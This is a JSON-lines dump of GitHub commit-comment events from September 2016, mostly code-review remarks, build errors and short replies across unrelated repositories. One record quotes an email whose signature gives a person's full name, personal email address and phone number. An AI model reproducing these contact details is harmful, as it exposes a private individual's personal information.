{"id":"4578206897","type":"CommitCommentEvent","actor":{"login":"Vultraz"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19065268,"position":5,"line":91,"path":"data/gui/widget/chatbox.cfg","commit_id":"33653e396945bf0e5d0ca56565149ae1f3328ba3","created_at":"2016-09-17T16:11:23Z","updated_at":"2016-09-17T16:11:23Z","body":"Yes, the actual chat text."}},"created_at":"2016-09-17T16:11:23Z"}
{"id":"4578207123","type":"CommitCommentEvent","actor":{"login":"miqlas"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":19065270,"position":null,"line":null,"path":null,"commit_id":"879a7381c66266dc24b2bb4f520b924893932562","created_at":"2016-09-17T16:11:34Z","updated_at":"2016-09-17T16:11:34Z","body":"Ok, it isn't perfect: \r\n`Error: found provides for \"readline == 7.0 base\", but none matching the version requirement\r\nkeeping chroot folder /Adat/Kodolas/haikuports/sys-libs/readline/work-x86-7.0 intact for inspection\r\nError: Build has failed - stopping.\r\n`"}},"created_at":"2016-09-17T16:11:34Z"}
{"id":"4578207796","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19065273,"position":1,"line":1,"path":"00-HTML-CSS-basics/estilos.css","commit_id":"3c600edf81e28fad77feb80262b4054338c32886","created_at":"2016-09-17T16:12:04Z","updated_at":"2016-09-17T16:12:04Z","body":"This file should be named in english, in this case `styles.css`."}},"created_at":"2016-09-17T16:12:04Z"}
{"id":"4578208505","type":"CommitCommentEvent","actor":{"login":"mcwreath31"},"repo":{"name":"mcwreath31/Allegheny-County-Property-Assessment"},"payload":{"comment":{"id":19065275,"position":23,"line":23,"path":"server.R","commit_id":"1c207df98f73e2b79ccf120eb9ee1400222f8e7b","created_at":"2016-09-17T16:12:32Z","updated_at":"2016-09-17T16:12:32Z","body":"Dr. B,\n\nThanks for reaching out. I removed the 3rd table. I have been having a big\nproblem with pushing this app to my shiny account. It runs perfectly\nlocally, just the way I want it for now, but when I attempt to publish it\nto my shiny account I get an error message reading \" ERROR: cannot open the\nconnection\".\n\nAttached are the ui and server files and well as the datasets I am\ncurrently using. If you could take a look at it for me I would really\nappreciate it. I have been trying to figure it out for the past couple days\nand have had no luck. I think it may have something to do with the Java\noutput of the table, but I could be wrong.\n\nLet me know that you think.\n\nThanks in advance.\n\nKyle McWreath\n\n\n\nOn Sat, Sep 17, 2016 at 10:26 AM, Matt Brigida <notifications@github.com>\nwrote:\n\n> Remove mytable3? Looks like it displays the R iris dataset.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mcwreath31/Allegheny-County-Property-Assessment/commit/1c207df98f73e2b79ccf120eb9ee1400222f8e7b#commitcomment-19065072>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANaWXVvGK5a1rmEPo_bUFGzRz2cgqkBOks5qrAa7gaJpZM4J_oFi>\n> .\n>\n\n\n\n-- \nKyle McWreath\nkyletmcwreath@gmail.com\n724-470-4599\n"}},"created_at":"2016-09-17T16:12:32Z"}
{"id":"4578209995","type":"CommitCommentEvent","actor":{"login":"DigitalPandacoin"},"repo":{"name":"ShapeShifter499/pandacoin"},"payload":{"comment":{"id":19065277,"position":null,"line":null,"path":null,"commit_id":"0dce4426b79e4288d0eaa7f972daf69b99fb0258","created_at":"2016-09-17T16:13:30Z","updated_at":"2016-09-17T16:13:30Z","body":"[PATCH] add support for miniupnpc api version 14"}},"created_at":"2016-09-17T16:13:30Z"}
{"id":"4578211058","type":"CommitCommentEvent","actor":{"login":"LDVSOFT"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19065280,"position":15,"line":15,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-17T16:14:09Z","updated_at":"2016-09-17T16:14:09Z","body":"Copy-Paste! `NOT NULL`?"}},"created_at":"2016-09-17T16:14:09Z"}
{"id":"4578211311","type":"CommitCommentEvent","actor":{"login":"LDVSOFT"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19065281,"position":18,"line":18,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-17T16:14:18Z","updated_at":"2016-09-17T16:14:18Z","body":"Мне нравится CodeStyle, но не хочешь `);` на следующей строчке?\r\nНу и не `UNIQUE` , а `PRIMARY KEY` же!"}},"created_at":"2016-09-17T16:14:18Z"}
{"id":"4578213103","type":"CommitCommentEvent","actor":{"login":"invy"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":19065285,"position":null,"line":null,"path":null,"commit_id":"11b16ec03fb555482d76a63c2885d94a611ff18e","created_at":"2016-09-17T16:15:31Z","updated_at":"2016-09-17T16:15:31Z","body":"Что надо сделать в фаре чтобы код отработал?"}},"created_at":"2016-09-17T16:15:31Z"}
{"id":"4578213793","type":"CommitCommentEvent","actor":{"login":"DigitalPandacoin"},"repo":{"name":"DigitalPandacoin/pandacoin"},"payload":{"comment":{"id":19065289,"position":null,"line":null,"path":null,"commit_id":"758ad7a89ddcf0435d7a725a11ba2657e34df383","created_at":"2016-09-17T16:15:58Z","updated_at":"2016-09-17T16:15:58Z","body":"[PATCH] add support for miniupnpc api version 14"}},"created_at":"2016-09-17T16:15:58Z"}
{"id":"4578214888","type":"CommitCommentEvent","actor":{"login":"eugkimStar"},"repo":{"name":"lollar/21_card_trick"},"payload":{"comment":{"id":19065291,"position":50,"line":50,"path":"Dealer.java","commit_id":"8379ad6db6ba9235c08d49a62041b4434c1eabc7","created_at":"2016-09-17T16:16:27Z","updated_at":"2016-09-17T16:16:27Z","body":"Hey, thanks for letting me know. I'll make the changes, and then some. I\nshould have my changes ready no later than 3, but ideally before 12.\n\nLike the Board code, by the way. Thank you for that.\n\nOn Sat, Sep 17, 2016 at 9:23 AM, absprague <notifications@github.com> wrote:\n\n> This code is good, but there is a couple of things I need to point out on\n> this method. First, the s on the dealtCards array is missing within the\n> method. Second, the deck should not be passed in, the class diagram shows\n> it should really be an array of cards that lives as part of the class\n> variables.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/lollar/21_card_trick/commit/8379ad6db6ba9235c08d49a62041b4434c1eabc7#commitcomment-19065054>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVK_szTAONs9E67K-rItMAlYUPM2XQ2yks5qrAXlgaJpZM4J_oCA>\n> .\n>\n"}},"created_at":"2016-09-17T16:16:27Z"}
{"id":"4578215032","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19065292,"position":null,"line":null,"path":null,"commit_id":"49b07d1a841728060d2ee4389309cd93f74888e8","created_at":"2016-09-17T16:16:33Z","updated_at":"2016-09-17T16:16:33Z","body":"++\r\nI think there are also a few things in ledger that need to be updated for the new user data dir config\r\ncc @mrose17 "}},"created_at":"2016-09-17T16:16:33Z"}
{"id":"4578215195","type":"CommitCommentEvent","actor":{"login":"bantuist"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":19065293,"position":154,"line":188,"path":"scripts/album.js","commit_id":"8863e82fdccc305b4bd786c1ea58a8e85553771a","created_at":"2016-09-17T16:16:40Z","updated_at":"2016-09-17T16:16:40Z","body":"This is the part I'm stuck on."}},"created_at":"2016-09-17T16:16:40Z"}
{"id":"4578215269","type":"CommitCommentEvent","actor":{"login":"gorbiz"},"repo":{"name":"gorbiz/touchart"},"payload":{"comment":{"id":19065294,"position":null,"line":null,"path":null,"commit_id":"c4dd0995213a18a9dffc029906537d308988bb5a","created_at":"2016-09-17T16:16:43Z","updated_at":"2016-09-17T16:16:43Z","body":"Example:\r\n![2](https://cloud.githubusercontent.com/assets/207850/18609456/d978c4c2-7d02-11e6-9645-df4124aafa7b.png)\r\n"}},"created_at":"2016-09-17T16:16:43Z"}
{"id":"4578215738","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19065297,"position":3,"line":3,"path":"00-HTML-CSS-basics/estilos.css","commit_id":"3c600edf81e28fad77feb80262b4054338c32886","created_at":"2016-09-17T16:17:04Z","updated_at":"2016-09-17T16:17:04Z","body":"This is fine for the purpose of this exercise, but remember to avoid using tags selectors in your styles. The only place where tag selectors belong is in css reset sheets (as _normalize.css_)."}},"created_at":"2016-09-17T16:17:04Z"}
{"id":"4578218426","type":"CommitCommentEvent","actor":{"login":"bolshoib"},"repo":{"name":"bolshoib/NetBeansTest"},"payload":{"comment":{"id":19065301,"position":null,"line":null,"path":null,"commit_id":"2e453bbd3077790bbc2ee1af948eebface2fb042","created_at":"2016-09-17T16:18:48Z","updated_at":"2016-09-17T16:18:48Z","body":"Merge"}},"created_at":"2016-09-17T16:18:48Z"}
{"id":"4578218706","type":"CommitCommentEvent","actor":{"login":"bolshoib"},"repo":{"name":"bolshoib/NetBeansTest"},"payload":{"comment":{"id":19065302,"position":null,"line":null,"path":null,"commit_id":"2e453bbd3077790bbc2ee1af948eebface2fb042","created_at":"2016-09-17T16:19:00Z","updated_at":"2016-09-17T16:19:00Z","body":"Merge"}},"created_at":"2016-09-17T16:19:00Z"}
{"id":"4578218982","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19065304,"position":1,"line":1,"path":"00-HTML-CSS-basics/expenses.html","commit_id":"3c600edf81e28fad77feb80262b4054338c32886","created_at":"2016-09-17T16:19:11Z","updated_at":"2016-09-17T16:19:11Z","body":"Indentation on this file does not follow our standard. Remember to use 4 spaces."}},"created_at":"2016-09-17T16:19:11Z"}
{"id":"4578219748","type":"CommitCommentEvent","actor":{"login":"piotrasd"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":19065306,"position":null,"line":null,"path":null,"commit_id":"2bd488fec9a0e8df6d9d63b470749b846d20a1b6","created_at":"2016-09-17T16:19:43Z","updated_at":"2016-09-17T16:19:43Z","body":"@vpeter4 could you confirm if in last version of kernel working PCIE ? on TBS matrix ? "}},"created_at":"2016-09-17T16:19:43Z"}
{"id":"4578219870","type":"CommitCommentEvent","actor":{"login":"alanhamlett"},"repo":{"name":"alcatraz/Alcatraz"},"payload":{"comment":{"id":19065307,"position":4,"line":1,"path":"CHANGELOG.md","commit_id":"ddb23805cc854ba4fcd771f5d50355cb262692b1","created_at":"2016-09-17T16:19:48Z","updated_at":"2016-09-17T16:19:48Z","body":"When will a new release be created for this version?"}},"created_at":"2016-09-17T16:19:48Z"}
{"id":"4578220409","type":"CommitCommentEvent","actor":{"login":"gorbiz"},"repo":{"name":"gorbiz/touchart"},"payload":{"comment":{"id":19065308,"position":null,"line":null,"path":null,"commit_id":"c4dd0995213a18a9dffc029906537d308988bb5a","created_at":"2016-09-17T16:20:09Z","updated_at":"2016-09-17T16:20:09Z","body":"![2-2](https://cloud.githubusercontent.com/assets/207850/18609479/5a6e22f2-7d03-11e6-91be-eeb1919f402d.png)\r\n"}},"created_at":"2016-09-17T16:20:09Z"}
{"id":"4578220534","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19065309,"position":2,"line":2,"path":"00-HTML-CSS-basics/index.html","commit_id":"3c600edf81e28fad77feb80262b4054338c32886","created_at":"2016-09-17T16:20:13Z","updated_at":"2016-09-17T16:20:13Z","body":"Indentation on this file does not follow our standard. Remember to use 4 spaces."}},"created_at":"2016-09-17T16:20:13Z"}
{"id":"4578221831","type":"CommitCommentEvent","actor":{"login":"devSparkle"},"repo":{"name":"CLIPStudents/OPOMUN"},"payload":{"comment":{"id":19065311,"position":null,"line":null,"path":null,"commit_id":"9a527289357d07a9b7a59838597f90683e2557d4","created_at":"2016-09-17T16:21:06Z","updated_at":"2016-09-17T16:21:06Z","body":"Completed handler for #6."}},"created_at":"2016-09-17T16:21:06Z"}
{"id":"4578222924","type":"CommitCommentEvent","actor":{"login":"GusevMihail"},"repo":{"name":"GusevMihail/Project_Folder_Auto_Changer"},"payload":{"comment":{"id":19065316,"position":null,"line":null,"path":null,"commit_id":"e61b90bd964653400adf2874591ed7edf6dedf00","created_at":"2016-09-17T16:21:43Z","updated_at":"2016-09-17T16:21:43Z","body":"Logic was moved into \"change_project_folder\" function. Added callback, that call change_project_folder function when user open any scene."}},"created_at":"2016-09-17T16:21:43Z"}
{"id":"4578223439","type":"CommitCommentEvent","actor":{"login":"ab123321"},"repo":{"name":"Chainfire/selinux"},"payload":{"comment":{"id":19065317,"position":null,"line":null,"path":null,"commit_id":"9741246f4812da6998e99adb21de5b059c7bf386","created_at":"2016-09-17T16:22:03Z","updated_at":"2016-09-17T16:22:03Z","body":":heart: "}},"created_at":"2016-09-17T16:22:03Z"}
{"id":"4578226331","type":"CommitCommentEvent","actor":{"login":"palvarez89"},"repo":{"name":"Mariocj89/EchaloASuerte"},"payload":{"comment":{"id":19065321,"position":null,"line":null,"path":null,"commit_id":"6a5d187d634bdd2f959a0a53f7a3e9a7b2cfd6e6","created_at":"2016-09-17T16:23:56Z","updated_at":"2016-09-17T16:23:56Z","body":"Looks good +1"}},"created_at":"2016-09-17T16:23:56Z"}
{"id":"4578226389","type":"CommitCommentEvent","actor":{"login":"ly29"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":19065322,"position":null,"line":null,"path":null,"commit_id":"6e688cdbe8237e16e6e1544098694c44722d12f7","created_at":"2016-09-17T16:23:58Z","updated_at":"2016-09-17T16:23:58Z","body":"I mean this is a problem with the network, the blender build or specific python, downloading the certificate or turning off checking for certificates seems like bad idea. "}},"created_at":"2016-09-17T16:23:58Z"}
{"id":"4578228571","type":"CommitCommentEvent","actor":{"login":"eddibravo"},"repo":{"name":"ostapqwert/genmvc"},"payload":{"comment":{"id":19065325,"position":null,"line":null,"path":null,"commit_id":"b24733655a934adb6e2fcd29d3af881932d5649b","created_at":"2016-09-17T16:25:16Z","updated_at":"2016-09-17T16:25:16Z","body":"@ostapqwert мои комменты ты походу не читаешь :)\r\n\r\nГДЕ БЛЯТЬ composer с его autoload ???????"}},"created_at":"2016-09-17T16:25:16Z"}
{"id":"4578229976","type":"CommitCommentEvent","actor":{"login":"yuxitian"},"repo":{"name":"OHDSI/CohortMethod"},"payload":{"comment":{"id":19065328,"position":null,"line":null,"path":null,"commit_id":"dfa1b3407b373db1882fe1ebb8d435dc09af9d6c","created_at":"2016-09-17T16:26:10Z","updated_at":"2016-09-17T16:26:10Z","body":"i was just looking into the covariate balance metrics. i'll play around with this new code "}},"created_at":"2016-09-17T16:26:10Z"}
{"id":"4578230151","type":"CommitCommentEvent","actor":{"login":"cltnschlosser"},"repo":{"name":"Minecolonies/minecolonies"},"payload":{"comment":{"id":19065330,"position":null,"line":null,"path":null,"commit_id":"b82a030e9b55ff8dea548064e9a2a2204e2acbfa","created_at":"2016-09-17T16:26:18Z","updated_at":"2016-09-17T16:26:18Z","body":"@Kostronor They were already just ints that we casted to floats, and we don't need to work with floating point numbers. long is better"}},"created_at":"2016-09-17T16:26:18Z"}
{"id":"4578233034","type":"CommitCommentEvent","actor":{"login":"Defman21"},"repo":{"name":"Komodo/KomodoEdit"},"payload":{"comment":{"id":19065335,"position":5,"line":13,"path":"src/chrome/komodo/content/sdk/ui/menu.js","commit_id":"d09a2235980c0c819993e507ac50fa14c16e60cf","created_at":"2016-09-17T16:28:07Z","updated_at":"2016-09-17T16:28:07Z","body":"This should not be there."}},"created_at":"2016-09-17T16:28:07Z"}
{"id":"4578234403","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19065338,"position":11,"line":11,"path":"00-HTML-CSS-basics/media.html","commit_id":"3c600edf81e28fad77feb80262b4054338c32886","created_at":"2016-09-17T16:29:04Z","updated_at":"2016-09-17T16:29:04Z","body":"Although `<audio>` and `<video>` are currently supported by newest browsers, it is a good idea to add a text message advising the user just in case they were not supported by his browser."}},"created_at":"2016-09-17T16:29:04Z"}
{"id":"4578234905","type":"CommitCommentEvent","actor":{"login":"palvarez89"},"repo":{"name":"Mariocj89/EtCaterva-Ansible"},"payload":{"comment":{"id":19065341,"position":null,"line":null,"path":null,"commit_id":"5b7c11373e4f4e26b95a69578f38b2de68cc2583","created_at":"2016-09-17T16:29:23Z","updated_at":"2016-09-17T16:29:23Z","body":" What is `/var/logs/echaloasuerte/app` for? "}},"created_at":"2016-09-17T16:29:23Z"}
{"id":"4578235142","type":"CommitCommentEvent","actor":{"login":"cgchoffman"},"repo":{"name":"Komodo/KomodoEdit"},"payload":{"comment":{"id":19065342,"position":5,"line":13,"path":"src/chrome/komodo/content/sdk/ui/menu.js","commit_id":"d09a2235980c0c819993e507ac50fa14c16e60cf","created_at":"2016-09-17T16:29:32Z","updated_at":"2016-09-17T16:29:32Z","body":"Good eye.  I'll fix it Monday."}},"created_at":"2016-09-17T16:29:32Z"}
{"id":"4578235413","type":"CommitCommentEvent","actor":{"login":"vpeter4"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":19065343,"position":null,"line":null,"path":null,"commit_id":"2bd488fec9a0e8df6d9d63b470749b846d20a1b6","created_at":"2016-09-17T16:29:42Z","updated_at":"2016-09-17T16:29:42Z","body":"No idea - don't have anything to put in."}},"created_at":"2016-09-17T16:29:42Z"}
{"id":"4578236843","type":"CommitCommentEvent","actor":{"login":"vv221"},"repo":{"name":"dscharrer/void"},"payload":{"comment":{"id":19065344,"position":null,"line":null,"path":null,"commit_id":"4c7bd4decbe9db7265ec819f831f11561e1b5367","created_at":"2016-09-17T16:30:42Z","updated_at":"2016-09-17T16:30:42Z","body":"Thanks for this useful fix!\r\nI’m sharing it as a pre-compiled .deb package through my ./play.it project, I hope it’s OK with you:\r\nhttp://wiki.dotslashplay.it/en/games/never-alone#broken_shadows_display"}},"created_at":"2016-09-17T16:30:42Z"}
{"id":"4578237480","type":"CommitCommentEvent","actor":{"login":"piotrasd"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":19065347,"position":null,"line":null,"path":null,"commit_id":"2bd488fec9a0e8df6d9d63b470749b846d20a1b6","created_at":"2016-09-17T16:31:07Z","updated_at":"2016-09-17T16:31:07Z","body":"i have version where is soldered normal PCIE connector so i can connect normal PCIE tuner.\r\nWhere i can find some your nightly build ? for TBS Matrix ?"}},"created_at":"2016-09-17T16:31:07Z"}
{"id":"4578240117","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19065355,"position":25,"line":25,"path":"00-HTML-CSS-basics/media.html","commit_id":"3c600edf81e28fad77feb80262b4054338c32886","created_at":"2016-09-17T16:32:53Z","updated_at":"2016-09-17T16:32:53Z","body":"Each input field must have a name attribute to be submitted."}},"created_at":"2016-09-17T16:32:53Z"}
{"id":"4578240970","type":"CommitCommentEvent","actor":{"login":"qwertychouskie"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":19065356,"position":3,"line":988,"path":"src/scriptengine/scriptarray.cpp","commit_id":"f47ec883f6c487e4be1ef5fab2bf5c7faf8ab8cc","created_at":"2016-09-17T16:33:27Z","updated_at":"2016-09-17T16:33:27Z","body":"Tabs here too."}},"created_at":"2016-09-17T16:33:27Z"}
{"id":"4578245071","type":"CommitCommentEvent","actor":{"login":"raveit65"},"repo":{"name":"mate-desktop/mate-common"},"payload":{"comment":{"id":19065368,"position":null,"line":null,"path":null,"commit_id":"0cbb9c88dc747d8521be9e452b21b15bfdd98196","created_at":"2016-09-17T16:36:20Z","updated_at":"2016-09-17T16:36:20Z","body":"It is tagged, but as it is a simple package, untag it and i create it new."}},"created_at":"2016-09-17T16:36:20Z"}
{"id":"4578245111","type":"CommitCommentEvent","actor":{"login":"WhisperBTC"},"repo":{"name":"WhisperSystems/Signal-iOS"},"payload":{"comment":{"id":19065369,"position":null,"line":null,"path":null,"commit_id":"50cd4f54fcbe04262de72cf0b88053c23d4456c8","created_at":"2016-09-17T16:36:22Z","updated_at":"2016-09-17T16:36:22Z","body":"Thanks! BitHub has sent payment of  $62.10USD for this commit."}},"created_at":"2016-09-17T16:36:22Z"}
{"id":"4578247843","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19065373,"position":30,"line":30,"path":"00-HTML-CSS-basics/media.html","commit_id":"3c600edf81e28fad77feb80262b4054338c32886","created_at":"2016-09-17T16:38:16Z","updated_at":"2016-09-17T16:38:16Z","body":"Also you can add a `label` to describe each input. http://www.w3schools.com/tags/tag_label.asp"}},"created_at":"2016-09-17T16:38:16Z"}
{"id":"4578249614","type":"CommitCommentEvent","actor":{"login":"Ali0013"},"repo":{"name":"Ali0013/bayat0014"},"payload":{"comment":{"id":19065376,"position":9,"line":294,"path":"bot/beyondbot.lua","commit_id":"fc2cfecc5276a07bb9cd254e83880e23535dea97","created_at":"2016-09-17T16:39:28Z","updated_at":"2016-09-17T16:39:28Z","body":"190409149"}},"created_at":"2016-09-17T16:39:28Z"}
{"id":"4578250269","type":"CommitCommentEvent","actor":{"login":"Ali0013"},"repo":{"name":"Ali0013/bayat0014"},"payload":{"comment":{"id":19065377,"position":20,"line":304,"path":"bot/beyondbot.lua","commit_id":"fc2cfecc5276a07bb9cd254e83880e23535dea97","created_at":"2016-09-17T16:39:55Z","updated_at":"2016-09-17T16:39:55Z","body":"190409149"}},"created_at":"2016-09-17T16:39:55Z"}
{"id":"4578250605","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19065378,"position":3,"line":2,"path":"00-HTML-CSS-basics/expenses.html","commit_id":"75e993afb282b133a69e63c04cdad181c36ed432","created_at":"2016-09-17T16:40:09Z","updated_at":"2016-09-17T16:40:09Z","body":"If our content is in english, `lang` attribute should be `en`"}},"created_at":"2016-09-17T16:40:09Z"}
{"id":"4578252670","type":"CommitCommentEvent","actor":{"login":"JWGmeligMeyling"},"repo":{"name":"JWGmeligMeyling/blaze-persistence"},"payload":{"comment":{"id":19065384,"position":31,"line":31,"path":"integration/hibernate-base/src/main/java/com/blazebit/persistence/impl/hibernate/CommonHibernateUtils.java","commit_id":"b76153e26da7c5d71335c696cbfabbd2355df233","created_at":"2016-09-17T16:41:32Z","updated_at":"2016-09-17T16:41:32Z","body":"The same issue actually exists with `ManyToMany` relationships, and can probably be solved in a similar fashion. Investigating that now :smile:"}},"created_at":"2016-09-17T16:41:32Z"}
{"id":"4578256534","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19065395,"position":40,"line":31,"path":"00-HTML-CSS-basics/media.html","commit_id":"75e993afb282b133a69e63c04cdad181c36ed432","created_at":"2016-09-17T16:43:52Z","updated_at":"2016-09-17T16:43:52Z","body":"`<input>` is a self closing tag, you don't need the ending `</input>`"}},"created_at":"2016-09-17T16:43:52Z"}
{"id":"4578256774","type":"CommitCommentEvent","actor":{"login":"Bartuz"},"repo":{"name":"CucumisSativus/ddd_crm"},"payload":{"comment":{"id":19065396,"position":5,"line":9,"path":"app/models/user.rb","commit_id":"956991e36afea1f0d466e096bf603ecb18bd79dd","created_at":"2016-09-17T16:44:01Z","updated_at":"2016-09-17T16:44:01Z","body":"according to ruby style guide recommended name for such method would be `admin?`, not `is_admin?` https://github.com/bbatsov/ruby-style-guide#bool-methods-prefix"}},"created_at":"2016-09-17T16:44:01Z"}
{"id":"4578258073","type":"CommitCommentEvent","actor":{"login":"WhisperBTC"},"repo":{"name":"WhisperSystems/Signal-iOS"},"payload":{"comment":{"id":19065403,"position":null,"line":null,"path":null,"commit_id":"b59a0e47d7b398f5a68122310b39001e285fd4db","created_at":"2016-09-17T16:44:49Z","updated_at":"2016-09-17T16:44:49Z","body":"Thanks! BitHub has sent payment of  $60.87USD for this commit."}},"created_at":"2016-09-17T16:44:49Z"}
{"id":"4578259598","type":"CommitCommentEvent","actor":{"login":"s-espinosa"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19065407,"position":null,"line":null,"path":null,"commit_id":"6c69713db6b9f455e347a33514d4325ff86a58fe","created_at":"2016-09-17T16:45:42Z","updated_at":"2016-09-17T16:45:42Z","body":"@PlanetEfficacy I wouldn't mind seeing a test of the navbar in isolation, but testing it on different views seems like a little much? It feels like a little bit of a gray area, and I could definitely see a team deciding to test it on different views if that had been a concern in the past or if views were using different templates, etc. My thinking is if in the future I made some change to the navbar that would break a test, I would want to see a single failing test that identified the navbar as the source and not a slew of broken tests, which would seem to imply some larger problem.\r\n\r\nTo some degree you're likely testing this in other tests that require you to hit logout/login/cart/etc. from different pages since the presence of those buttons implies that the navbar is also present. \r\n\r\nWould be open to other opinions and intrigued what others might think on this one."}},"created_at":"2016-09-17T16:45:42Z"}
{"id":"4578259834","type":"CommitCommentEvent","actor":{"login":"the7winds"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19065408,"position":15,"line":15,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-17T16:45:52Z","updated_at":"2016-09-17T16:45:52Z","body":"ааааа"}},"created_at":"2016-09-17T16:45:52Z"}
{"id":"4578261205","type":"CommitCommentEvent","actor":{"login":"core2p0"},"repo":{"name":"core2p0/Slackbot"},"payload":{"comment":{"id":19065412,"position":null,"line":null,"path":null,"commit_id":"ca963e590e9d8c026094e3fa62a290b9bf07511b","created_at":"2016-09-17T16:46:44Z","updated_at":"2016-09-17T16:46:44Z","body":"새벽에 \"안 주무실건가요?\" 메시지를 추가로 더 보냅니다."}},"created_at":"2016-09-17T16:46:44Z"}
{"id":"4578262270","type":"CommitCommentEvent","actor":{"login":"jsirois"},"repo":{"name":"apache/aurora"},"payload":{"comment":{"id":19065417,"position":null,"line":null,"path":null,"commit_id":"e67c6a732c00786bc74d63d4fb2b9f5f398c5435","created_at":"2016-09-17T16:47:27Z","updated_at":"2016-09-17T16:47:27Z","body":"I've got it, tracked in https://issues.apache.org/jira/browse/AURORA-1775\r\nThanks for pointing this out @TexasRed "}},"created_at":"2016-09-17T16:47:27Z"}
{"id":"4578262571","type":"CommitCommentEvent","actor":{"login":"the7winds"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19065420,"position":18,"line":18,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-17T16:47:39Z","updated_at":"2016-09-17T16:47:39Z","body":"я не совсем понимаю отличия между PK и U"}},"created_at":"2016-09-17T16:47:39Z"}
{"id":"4578262750","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19065421,"position":50,"line":41,"path":"00-HTML-CSS-basics/media.html","commit_id":"75e993afb282b133a69e63c04cdad181c36ed432","created_at":"2016-09-17T16:47:46Z","updated_at":"2016-09-17T16:47:46Z","body":"You do not need to add an `aria-labelledby` attribute to an `input` to make it accessible, if you add a `<label>` is enough."}},"created_at":"2016-09-17T16:47:46Z"}
{"id":"4578264072","type":"CommitCommentEvent","actor":{"login":"ghseeli"},"repo":{"name":"ghseeli/grad-school-notes"},"payload":{"comment":{"id":19065424,"position":null,"line":null,"path":null,"commit_id":"183282ab1b26b0b23e6383e8b9908ed42a40929b","created_at":"2016-09-17T16:48:38Z","updated_at":"2016-09-17T16:48:38Z","body":"@MareoRaft please check that this makes sense with your notation. The conclusion in my notes is that $(\\psi_b \\circ f \\circ \\phi_a)'(x)$ has rank $m$."}},"created_at":"2016-09-17T16:48:38Z"}
{"id":"4578264615","type":"CommitCommentEvent","actor":{"login":"mhutti1"},"repo":{"name":"kiwix/kiwix"},"payload":{"comment":{"id":19065427,"position":null,"line":null,"path":null,"commit_id":"6e60848765776654b2846798ed7c9f47e4107a85","created_at":"2016-09-17T16:49:00Z","updated_at":"2016-09-17T16:49:00Z","body":"@EladKeyshawn This wasn't updated in the customapp generation script. I have done so now."}},"created_at":"2016-09-17T16:49:00Z"}
{"id":"4578265151","type":"CommitCommentEvent","actor":{"login":"monsta"},"repo":{"name":"mate-desktop/mate-common"},"payload":{"comment":{"id":19065428,"position":null,"line":null,"path":null,"commit_id":"0cbb9c88dc747d8521be9e452b21b15bfdd98196","created_at":"2016-09-17T16:49:21Z","updated_at":"2016-09-17T16:49:21Z","body":"Alright."}},"created_at":"2016-09-17T16:49:21Z"}
{"id":"4578265706","type":"CommitCommentEvent","actor":{"login":"the7winds"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19065429,"position":18,"line":18,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-17T16:49:44Z","updated_at":"2016-09-17T16:49:44Z","body":"@LDVSOFT, можно попробовать и на следующей строчке"}},"created_at":"2016-09-17T16:49:44Z"}
{"id":"4578268000","type":"CommitCommentEvent","actor":{"login":"HumanSprout"},"repo":{"name":"HumanSprout/udemynode"},"payload":{"comment":{"id":19065434,"position":null,"line":null,"path":null,"commit_id":"f6f7fe93544835f629b3d305caf2b45c26aff85c","created_at":"2016-09-17T16:51:15Z","updated_at":"2016-09-17T16:51:15Z","body":"logging error"}},"created_at":"2016-09-17T16:51:15Z"}
